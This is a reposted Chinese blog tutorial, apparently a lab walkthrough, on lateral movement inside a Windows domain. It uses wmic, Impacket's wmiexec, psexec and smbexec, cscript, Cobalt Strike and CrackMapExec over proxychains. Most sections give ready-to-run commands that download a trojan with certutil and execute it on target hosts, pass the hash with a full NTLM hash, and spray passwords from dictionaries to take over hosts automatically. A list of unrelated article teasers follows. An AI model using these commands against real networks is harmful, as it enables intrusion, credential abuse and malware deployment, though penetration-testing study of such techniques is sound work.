内网横线移动—WmiSmbCrackMapExecProxyChainsImpacket

news2024/11/24 2:56:38

内网横线移动—Wmi&Smb&CrackMapExec&ProxyChains&Impacket

  • 1. 前置环境准备
  • 2. wmic介绍
    • 2.1. wmic操作演示
      • 2.1.1. 受控主机上线
        • 2.1.1.1. 内网存活探测
        • 2.1.1.2. 密码抓取
      • 2.1.2. 横向移动
        • 2.1.2.1. 上传文件
        • 2.1.2.2. 文件上传目标主机
        • 2.1.2.3. 执行木马
    • 2.2. wmiexec-impacket套件操作演示
      • 2.2.1. 设置socks代理
        • 2.2.1.1. 设置代理服务器
        • 2.2.1.2. 设置代理规则
        • 2.2.1.3. 代理测试
      • 2.2.2. 横向移动
        • 2.2.2.1. 文件上传目标主机
        • 2.2.2.2. 执行木马
  • 3. cscript介绍
    • 3.1. cscript操作演示
  • 4. psexec
    • 4.1. psexec基础演示
    • 4.2. 套件中psexec
    • 4.3. CS插件psexec演示
      • 4.3.1. 设置转发上线
      • 4.3.2. 选择目标
      • 4.3.3. 设置psexec
      • 4.3.4. 查看上线效果
  • 5. smbexec
  • 6. Linux+proxychains+CrackMapExec
    • 6.1. proxychains介绍
      • 6.1.1. 下载源码
      • 6.1.2. 编译安装
      • 6.1.3. 设置代理
    • 6.2. CrackMapExec介绍
      • 6.2.1. 常见使用方式
      • 6.2.2. 实操演示
        • 6.2.2.1. 设置转发代理
        • 6.2.2.2. 添加代理转发
        • 6.2.2.3. 使用测试
        • 6.2.2.4. 上线操作

1. 前置环境准备

  这里很简单,我也不想再去画图了,直接看IP地址吧。

攻击机:外网IP
受控主机:外网IP:192.168.10.100
				内网IP:192.168.20.20
域控主机:192.168.20.10
其它主机:192.168.20.30

2. wmic介绍

  Windows中的wmi是Windows管理工具,它是Windows操作系统中管理数据和操作的基础模块,并且wmic 是通过 135 端口进行利用,支持用户名明文或者 hash 的方式进行认证,同时该方法不会在目标日志系统留下痕迹。

  wmic是Windows中系统自带的命令,有利于我们进行横向移动,无需再上传一些python脚本或者exe程序,避免存在后续被发现的可能,不过wmic无回显,简单来说就是命令运行完后,无法看到执行的内容,所以这里在使用上多局限于只能运行shell,让其上线,至于说执行其它命令,是无法看见的,但是我们主要的目标就是让其上线,上线后就可以操作了。

2.1. wmic操作演示

  首先这里我们让其中一台主机上线,上线我们继续信息收集,想必这里我就不用再演示了,再之前都已经演示过了。

2.1.1. 受控主机上线

  可以看到这里我是让其上线了,不用看我的外网地址,都是热点。

在这里插入图片描述

2.1.1.1. 内网存活探测

  在前面我们介绍了,wmic是依靠135端口来继续横向移动的,那么我们首先来探测内网有哪些主机是开放135端口的。主要要注意,如果上线的用户没有权限进行扫描,那么就需要进行提权。

  可以看到这里我们扫到了,三台主机,其中有一台是我们已经上线的主机了。所以我们主要对这另外两台进行横向移动。

在这里插入图片描述

2.1.1.2. 密码抓取

  这里我们再去抓取一下密码,以便我们后续的横向移动。

在这里插入图片描述

2.1.2. 横向移动

  这里我们就需要进行横向移动了,这里生成一个木马,由于目标主机是内网中,无法出网,那么这里就需要一个设置一个转发上线,当然也可以使用正向木马,而我这里使用反向木马,很多简单的操作我就不操作了,之前很多的文章中都介绍了,各种上线方式。

2.1.2.1. 上传文件

  这里设置转发上线,然后生成一个木马,在将木马上传到受控主机,注意这里需要上传到web界面下,而不是这里,这里我一开始是想直接复制文件到目标主机的,但是经过测试命令是能够执行成功的,但是目标主机文件是没上传成功的,这里各位测试过,如果成功了,告知我一下。

在这里插入图片描述

2.1.2.2. 文件上传目标主机

  这里非常抱歉,我使用域内账户来执行发现权限不够,所以这里我切换了一下权限,看来还是需要使用到system的权限。下面的这个密码也是我后期重新获取的。

wmic /node:192.168.20.30 /user:administrator /password:admin@123 process call create "cmd.exe /c certutil -urlcache -split -f http://192.168.20.20/3333.exe c:/3333.exe"

在这里插入图片描述

2.1.2.3. 执行木马

  到这里我们就可以执行文件了,这里也上线了,不过要注意这个是反向木马,如果是正向的是一样的操作。

wmic /node:192.168.20.30 /user:administrator /password:admin@123 process call create "c:/3333.exe"

在这里插入图片描述

2.2. wmiexec-impacket套件操作演示

  这里我们前期的受控主机上线就不演示了,直接演示横向移动吧,这里需要使用到套件,这里我们使用py版本,exe文件太大了,而且存在被杀的风险,同时为了,保证安全,我们不将文件上传,直接开启socks代理,本地运行。

  impacket

2.2.1. 设置socks代理

  这里使用工具进行设置socks代理,应该不用说了吧,之前写文章都很详细,后续将一些不必要的内容,或者很简单内容都去除,直接上效果,或者一些必要的操作。

2.2.1.1. 设置代理服务器

  注意这里的代理要设置你的CS服务器的代理,至于端口怎么获取,自己想!

在这里插入图片描述

2.2.1.2. 设置代理规则

  这里我们设置由于访问192.168.20.*才使用这个代理。

在这里插入图片描述

2.2.1.3. 代理测试

  这里需要注意哦,使用python的时候,这个套件是需要下载模块的,这边已经提前下载了。

  可以看到这里我们也是成功获取到信息,证明能够正常连接。

python wmiexec.py ./administrator:admin@123@192.168.20.30 "whoami"
python wmiexec.py -hashes :579da618cfbfa85247acf1f800a280a4 ./administrator@192.168.20.30 "whoami"

在这里插入图片描述

2.2.2. 横向移动

  到这里我们就可以开始横向移动了,这里还是以前提前将木马上传到受控主机的web目录下, 然后让目标主机下载。这里我就不演示上传木马了,直接让目标主机下载吧。

2.2.2.1. 文件上传目标主机

  这里的木马,是无法直接使用访问外网上线了,需要设置转发上线,不要搞错了,设置完毕后,再上传木马到受控主机中,让目标主机去受控主机上下载木马。

wmiexec.py ./administrator:admin@123@192.168.20.30 "cmd.exe /c certutil -urlcache -split -f http://192.168.20.20/3333.exe c:/3333.exe"

在这里插入图片描述

2.2.2.2. 执行木马

  上传后就可以执行木马了,这里我们也看到是成功反弹会话了,同样这里是反向木马,想要使用正向木马,也简单,这里我就不演示了。

wmiexec.py ./administrator:admin@123@192.168.20.30 "cmd.exe /c c:/3333.exe"

在这里插入图片描述

3. cscript介绍

  Cscript 是 Windows 脚本宿主的一个版本,可以用来从命令行运行脚本。同时也是一个内置的命令,但是这个命令无回显,所以这里就需要使用到一些脚本,来让其成功回显。

wmiexec

3.1. cscript操作演示

  不过这里有个问题就是cscript是交互式的,所以再CS中无法操作,只有将文件上传到受控主机上,使用受控主机去连接目标主机,不过正常来说使用cscript还是比较少的,主要是麻烦。

cscript //nologo wmiexec.vbs /shell 192.168.20.30 administrator admin@123

在这里插入图片描述

4. psexec

  利用SMB服务可以通过明文或hash传递来远程执行,条件445服务端口开放。psexec 是pstools 微软官方软件中的一个工具,是 windows 下非常好的一款远程命令行工具。psexec的使用不需要对方主机开方3389端口,只需要对方开启admin$共享 (该共享默认开启)。但是,假如目标主机开启了防火墙,psexec也是不能使用的,会提示找不到网络路径。由于psexec是Windows提供的工具,所以杀毒软件将其列在白名单中。但是PsExec在内网中大杀四方后,很多安全厂商开始将PsExec加入了黑名单。

  psexec

4.1. psexec基础演示

  这个工具经过测试,本地无法进行连接上目标主机,已经设置代理转发了,但是还是不行,这里就把命令演示一下吧,我个人感觉连接不上的原因还是由于没走设置的socks代理,但是我设置了半天还是不行。

psexec \\192.168.20.30 -u administrator -p admin@123 -s cmd
psexec -hashes :579da618cfbfa85247acf1f800a280a4 ./administrator@192.168.20.30 

4.2. 套件中psexec

  这里本地上使用的是套件中的psexec能够执行成功,不过这个只能使用hash值来进行连接,并且不是官方的容易被干。

python psexec.py -hashes :579da618cfbfa85247acf1f800a280a4 ./administrator@192.168.20.30

在这里插入图片描述

4.3. CS插件psexec演示

  关于psexec,在cs中是自带这个工具的,这里演示一下,前提就是将所有的密码都抓取到,以及目标列表。

4.3.1. 设置转发上线

  这里需要设置一个转发上线,想必应该也知道为什么,因为目标无法出网啊。

在这里插入图片描述

4.3.2. 选择目标

  这里我就选择这个192.168.20.30作为目标进行横向移动。

在这里插入图片描述

4.3.3. 设置psexec

  这里我们选择一个密码,当然啦,实际中你可能不知道密码,那么就一个个测试被,要注意,psexec64是不支持hash密码的,可以选择psexec来上线,域的话,要删除,不让容易无法上线,监听器就设置之前转发上线的监听器,会话选择system权限的。

在这里插入图片描述

4.3.4. 查看上线效果

  可以看到成功上线,所以关于psexec,说真的,如果socks能够代理成功,那么本地执行挺好的,如果无法,那么就使用cs中自带的这个psexec来执行也不错。

在这里插入图片描述

5. smbexec

  这个也是wmiexec-impacket套件中的工具,和psexec是差不多的用法,当然这里也是要开代理的。

python smbexec.py ./administrator:admin@123@192.168.20.30 
python smbexec.py -hashes :579da618cfbfa85247acf1f800a280a4 administrator@192.168.20.30  

在这里插入图片描述

6. Linux+proxychains+CrackMapExec

  这里我利用Linux+proxychains+CrackMapExec实现,这里我本来想使用公网IP来进行测试的,但是发现安装上有很多的问题,然后再kail中是自带这个,所以直接使用kail来演示吧。

6.1. proxychains介绍

  这个工具其实和Windows中的Proxifier一样,只是这个是命令操作而已。

6.1.1. 下载源码

git clone https://github.com/haad/proxychains.git

在这里插入图片描述

6.1.2. 编译安装

cd proxychains
./configure
make
sudo make install

在这里插入图片描述

6.1.3. 设置代理

  这里就可以设置代理了。

vi /usr/local/etc/proxychains.conf
在最下面添加需求的代理即可
socket5 127.0.0.1 1080

在这里插入图片描述

6.2. CrackMapExec介绍

  在内网渗透中,能获取到主机管理员账号密码,将会使我们横向事半功倍,尤其是在大内网环境中,密码复用率很高,一波喷洒,能助力你拿到一波主机,对拿到的主机再次抓取密码,再用新拿到的密码喷洒一波…,如此反复。密码喷洒的思路就是这样:不断收集内网账号密码,不断去喷洒。这时我们就需要类似CrackMapExec这样的密码喷洒工具,对其内网进行密码喷洒。

  CrackMapExec

  官方手册

6.2.1. 常见使用方式

  当然这里还有很多的操作,这里只是演示一部分。

密码喷射域登录(验证用户名密码是否正确):
proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123'

密码喷射本地登录(验证用户名密码是否正确):
proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123' --local-auth

密码喷射本地登录命令执行:
proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123' -x 'whoami' --local-auth

cs上线为反向连接,需要代理转发,转发上线
密码喷射本地登录命令执行上线:
proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.20.20/2222.exe c:/2222.exe & c:/2222.exe' --local-auth


密码喷射域登录命令执行上线:
proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.20.20/2222.exe c:/2222.exe & c:/2222.exe'

密码喷射本地&域登录命令执行全自动上线:
写两个字典,一个放用户名,另一个放密码
proxychains crackmapexec smb 192.168.20.10-30 -u user.txt -p pass.txt -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.20.20/2222.exe c:/2222.exe & c:/2222.exe'

6.2.2. 实操演示

  这里首先是获取其中一个system权限,然后设置代理,让工具能够连接上内网,才能对内网进行测试。

6.2.2.1. 设置转发代理

  这里设置一个socks转发代理。

在这里插入图片描述

6.2.2.2. 添加代理转发

  获取端口后,在代理工具的配置文件中添加相应的代理即可。

vim /usr/local/etc/proxychains4.conf

在这里插入图片描述

6.2.2.3. 使用测试

   密码喷射测试域账户密码。

proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123'

在这里插入图片描述

6.2.2.4. 上线操作

  这里需要先使用cs设置转发上线,并设置一个木马,让目标主机下载,然后在去执行,实现上线操作。这里就不演示如何设置cs的转发上线,直接生成木马吧。

  当然我这里是使用反向的,懒得使用正向的再去连接了,可以看是成功上线了两台。

proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.20.20/2222.exe c:/2222.exe & c:/2222.exe' --local-auth

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/703243.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

JAVA 安全-JWT 安全及预编译 CASE 注入等(40)

在各种语言脚本的环境下,也会产生一些新的漏洞,如果是java又能产生那些漏洞,思维导图里面常规漏洞之前都有; java的访问控制,jwt令牌(php几乎没有)组件安全,这些都是java特有的 #综…

C#核心知识回顾——3.继承构造、拆装箱、多态

1.继承中的构造函数: 特点: 当申明一个子类对象时 先执行父类的构造函数,再执行子类的构造函数注意!!: 1.父类的无参构造很重要 2.子类可以通过base关键字代表父类调用父类构造 public class Mot…

【单片机】STM32单片机,定时器的输入捕获,基于捕获的频率计,STM32F103

文章目录 简单介绍外部计数频率计TIM5 频率计 简单介绍 下面的定时器都具有输入捕获能力: 外部计数频率计 查看另一篇文章:https://qq742971636.blog.csdn.net/article/details/131471539 外部计数频率计的缺点:需要两个定时器配合&#x…

控制 显示、隐藏

1、使用 v-if < v-if"isShow"></> data(){ return:{ isShow:false } } if (concepts && concepts.length >0){ this.isShow nv.concepts.includes(snap) } 确认 数组中有某个 字段&#xff0c;用includes 有&…

Qt QGraphics导入背景图并绘制图形,画布移动、缩放、图形旋转等

前言 之前写过一篇博文《Qt鼠标拖动绘制基本几何图形》 &#xff0c;这是介绍使用QGraphic中利用鼠标事件实现基本几何图形的绘制&#xff0c;支持直线、矩形、圆形、椭圆&#xff0c;本次是在此基础上进行扩展&#xff0c;实现背景图导入&#xff0c;并在图片上进行几何图形绘…

现货白银行情实时行情与展望

现货白银作为低门槛、高收益的贵金属投资工具&#xff0c;因为交易时间自且没有涨跌幅限制而大受全球投资者追捧&#xff0c;它每天的实时行情走势中充满机会&#xff0c;投资者可结合技术和基本面分析手段&#xff0c;预测其未来的价格走势&#xff0c;在市场的波动中把握住获…

Go编写流量代理工具

目录 这是一个演示主要分为俩包&#xff1a;流程&#xff1a;逻辑&#xff1a;(端口随意&#xff0c;本地ssh为例)用法&#xff1a;文件地址&#xff1a;代码如下&#xff1a; 这是一个演示 代理本地HTTP服务 代理局域网SSH服务 其他的TCP服务没测试了 主要分为俩包&#x…

什么是DevOps? 什么是DORA?

1. 前言 对于搞云原生应用的同学&#xff0c;对于DevOps和DORA应该都不陌生。但对于传统应用程序开发的同学&#xff0c;经常被DevOps, Microservice, CICD, DORA这些新颖的名词搞得晕头转向。那么到底什么是DevOps? 什么是DORA呢&#xff1f; 2. 解析 2.1 DevOps DevOps并…

群晖NAS搭建WebDV服务手机ES文件浏览器远程访问

文章目录 1. 安装启用WebDAV2. 安装cpolar3. 配置公网访问地址4. 公网测试连接5. 固定连接公网地址 转载自cpolar极点云文章&#xff1a;群晖NAS搭建WebDAV服务手机ES文件浏览器远程访问 有时候我们想通过移动设备访问群晖NAS 中的文件,以满足特殊需求,我们在群辉中开启WebDav服…

支持刷机(OpenWrt)的路由器大全

2023年上半年最热门的刷机路由器当然是360T7、小米WR30U这两款&#xff0c;主要是性价比高&#xff0c;闲鱼100多搞定&#xff0c;支持刷OpenWrt、支持WiFi6&#xff0c;采用MTK798X系列处理器&#xff0c;性能强&#xff0c;轻松跑满千兆&#xff0c;如果你想追新&#xff0c;…

SpringMVC基础知识

一、SpringMVC 1. Spring与Web环境集成 1.1 ApplicationContext应用上下文获取方式 应用上下文对象是通过new ClasspathXmlApplicationContext(spring配置文件) 方式获取的&#xff0c;但是每次从容器中获得Bean时都要编写new ClasspathXmlApplicationContext(spring配置文件…

云捷|打破应用孤岛加速企业数字化转型

CBG云服务BU X 神州数码云基地 一、引言 从流程信息化到整体的数字化转型&#xff0c;对企业而言是一场深刻的升级再造。企业在决心开启数字化转型之路后&#xff0c;有近5成民营企业数字化转型采用标准化工具&#xff1b;关于“贵公司未来将在工作中增加哪些数字应用的使用…

强化学习从基础到进阶-案例与实践[4.2]:深度Q网络DQN-Cart pole游戏展示

【强化学习原理项目专栏】必看系列&#xff1a;单智能体、多智能体算法原理项目实战、相关技巧&#xff08;调参、画图等、趣味项目实现、学术应用项目实现 专栏详细介绍&#xff1a;【强化学习原理项目专栏】必看系列&#xff1a;单智能体、多智能体算法原理项目实战、相关技巧…

基于PaddleDetection fairmot目标跟踪 C++ 部署

1 源码下载 PaddleDetection 2 工程编译 参考&#xff1a;paddle 目标检测C部署流程 3 导出模型 python tools/export_model.py -c configs/mot/fairmot/fairmot_dla34_30e_576x320.yml --output_dir ./inference -o weightshttps://paddledet.bj.bcebos.com/models/mot/…

AutoSAR系列讲解(入门篇)4.7-BSW的Diagnostics功能

一、架构与术语解释 首先简单介绍以下诊断&#xff08;Diagnostics&#xff09;&#xff0c;由于百度百科中就有很好的解释&#xff0c;这里直接引用一下&#xff1a; 汽车诊断技术是凭借仪器设备对汽车进行性能测试和故障检查的方法和手段&#xff0c;它能够测试出汽车各项工作…

CMU 15-445 -- 存储篇 - 02

CMU 15-445 -- 存储篇 - 02 引言Database StorageDisk Manager 简介计算机存储体系为什么不使用 OS 自带的磁盘管理模块磁盘管理模块的核心问题在文件中表示数据库File StorageDatabase PagesHeap File OrganizationPage LayoutData LayoutTuple LayoutTuple Storage Data Repr…

Windows Update当前无法检查更新怎么办?

当进行Windows更新或升级时&#xff0c;可能会提示“Windows Update当前无法检查更新&#xff0c;因为未运行服务。您可能需要重新启动计算机”。而当重启也无法解决问题时&#xff0c;我们该怎么办呢&#xff1f;下面我们就来了解一下。 1、删除Software Distribution文件夹中…

Hyperledger Fabric交易流程分析

1、交易流程 客户端利用受支持的SDK(Golang、Java、Node、Python)提供的API构建交易提案请求&#xff0c;将交易事务提案打包成为一个正确的格式。交易提案包含如下要素&#xff1a; ①channelID:通道信息。 ②chaincodelD:要调用的链码信息。 ③timestamp:时间戳。 ④sign:客户…

百度智能车竞赛丝绸之路2——手柄控制

百度智能车竞赛丝绸之路1——智能车设计与编程实现控制 百度智能车竞赛丝绸之路2——手柄控制 一、机器人设计 二、实现原理 本教程使用Python的Serial库和Struct二进制数据解析库去实现Xbox手柄百度大脑学习开发板&#xff08;上位机&#xff09;和机器人控制器&#xff08;…

9小时通关 黑马新教程发布,含重磅项目~

随着测试行业的蓬勃发展&#xff0c;对从业者的要求越来越高&#xff0c;自动化测试已经成为软件测试中一个重要组成部分&#xff0c;广泛应用于各行各业。甚至&#xff0c;在圈子中还流传着这样一句话&#xff1a;学好测试自动化&#xff0c;年薪30万不在话下&#xff01; 今…